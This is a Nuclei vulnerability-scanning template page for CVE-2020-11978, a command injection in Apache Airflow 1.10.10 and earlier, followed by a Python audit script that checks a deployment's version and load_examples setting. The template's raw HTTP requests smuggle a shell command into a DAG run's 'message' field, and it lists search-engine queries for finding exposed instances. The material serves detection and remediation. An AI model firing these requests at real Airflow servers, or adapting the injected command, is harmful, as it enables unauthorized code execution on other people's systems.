Apache Airflow <=1.10.10 - Remote Code Execution
ID: CVE-2020-11978
Severity: high
Author: pdteam
Tags: cve2020,cve,packetstorm,apache,airflow,rce,kev
Description
Apache Airflow versions 1.10.10 and below are vulnerable to remote code/command injection vulnerabilities in one of the example DAGs shipped with Airflow. This could allow any authenticated user to run arbitrary commands as the user running airflow worker/scheduler (depending on the executor in use).
YAML Source
id: CVE-2020-11978

info:
  name: Apache Airflow <=1.10.10 - Remote Code Execution
  author: pdteam
  severity: high
  description: Apache Airflow versions 1.10.10 and below are vulnerable to remote code/command injection vulnerabilities in one of the example DAGs shipped with Airflow. This could allow any authenticated user to run arbitrary commands as the user running airflow worker/scheduler (depending on the executor in use).
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
  remediation: If you already have examples disabled by setting load_examples=False in the config then you are not vulnerable.
  reference:
    - https://github.com/pberba/CVE-2020-11978
    - https://twitter.com/wugeej/status/1400336603604668418
    - https://lists.apache.org/thread.html/r7255cf0be3566f23a768e2a04b40fb09e52fcd1872695428ba9afe91%40%3Cusers.airflow.apache.org%3E
    - https://nvd.nist.gov/vuln/detail/CVE-2020-11978
    - http://packetstormsecurity.com/files/174764/Apache-Airflow-1.10.10-Remote-Code-Execution.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2020-11978
    cwe-id: CWE-78
    epss-score: 0.97444
    epss-percentile: 0.99947
    cpe: cpe:2.3:a:apache:airflow:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 4
    vendor: apache
    product: airflow
    shodan-query:
      - title:"Airflow - DAGs" || http.html:"Apache Airflow"
      - http.title:"airflow - dags" || http.html:"apache airflow"
      - http.title:"sign in - airflow"
      - product:"redis"
    fofa-query:
      - title="sign in - airflow"
      - apache airflow
      - title="airflow - dags" || http.html:"apache airflow"
    google-query:
      - intitle:"sign in - airflow"
      - intitle:"airflow - dags" || http.html:"apache airflow"
  tags: cve2020,cve,packetstorm,apache,airflow,rce,kev

http:
  - raw:
      - |
        GET /api/experimental/test HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
      - |
        GET /api/experimental/dags/example_trigger_target_dag/paused/false HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
      - |
        POST /api/experimental/dags/example_trigger_target_dag/dag_runs HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/json

        {"conf": {"message": "\"; touch test #"}}
      - |
        GET /api/experimental/dags/example_trigger_target_dag/dag_runs/{{exec_date}}/tasks/bash_task HTTP/1.1
        Host: {{Hostname}}
        Accept: */*

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - 'contains(body_4, "operator":"BashOperator")'
          - 'contains(header_4, "application/json")'
        condition: and

    extractors:
      - type: regex
        name: exec_date
        group: 1
        regex:
          - '"execution_date":"([0-9-A-Z:+]+)"'
        internal: true
        part: body
# digest: 490a00463044022039c0f74fdeaf2dcd60bdc70df13a3335c8b1518605105f9388d80a6ffa8650fe02200d4c6ad8430d3525421eb9c83f089d5bf987375111e3c2226562d00d5cf2dbfc:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2020/CVE-2020-11978.yaml"
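
A host-side counterpart to the scan, added here as an example (it is not part of the template or of the Airflow project): it applies the template's remediation note by working out whether a deployment both runs an affected version and still loads the example DAGs. The sample config and the function names are constructed for illustration; the `AIRFLOW__CORE__LOAD_EXAMPLES` override follows Airflow's `AIRFLOW__{SECTION}__{KEY}` environment-variable convention, which takes precedence over `airflow.cfg`.

```python
import configparser

AFFECTED_MAX = (1, 10, 10)          # the page: versions 1.10.10 and below
FALSE_VALUES = {"f", "false", "0"}  # strings treated here as boolean false

# Constructed sample config, not taken from a real deployment.
SAMPLE_CFG = """
[core]
dags_folder = /opt/airflow/dags
load_examples = True
"""


def parse_version(text):
    """Turn '1.10.10' or '1.10.10rc1' into a comparable 3-tuple of ints."""
    parts = []
    for piece in text.strip().split(".")[:3]:
        digits = ""
        for ch in piece:
            if not ch.isdigit():
                break
            digits += ch
        parts.append(int(digits or 0))
    return tuple(parts + [0] * (3 - len(parts)))


def examples_loaded(cfg_text, environ):
    """Effective [core] load_examples; the environment overrides the file."""
    value = environ.get("AIRFLOW__CORE__LOAD_EXAMPLES")
    if value is None:
        # interpolation=None: airflow.cfg contains literal '%' characters.
        parser = configparser.ConfigParser(interpolation=None)
        parser.read_string(cfg_text)
        # A missing key counts as enabled, matching Airflow's default of True.
        value = parser.get("core", "load_examples", fallback="True")
    return value.strip().lower() not in FALSE_VALUES


def audit(version, cfg_text, environ):
    """Return (exposed, reason) for one Airflow deployment."""
    if parse_version(version) > AFFECTED_MAX:
        return False, "version above 1.10.10"
    if not examples_loaded(cfg_text, environ):
        return False, "load_examples is disabled"
    return True, "affected version with example DAGs loaded"


if __name__ == "__main__":
    print(audit("1.10.10", SAMPLE_CFG, {}))
    print(audit("1.10.10", SAMPLE_CFG, {"AIRFLOW__CORE__LOAD_EXAMPLES": "False"}))
```

On a real host, pass the contents of the deployment's `airflow.cfg` and `os.environ` of the scheduler or worker process, since the override only matters in the environment those processes actually run with.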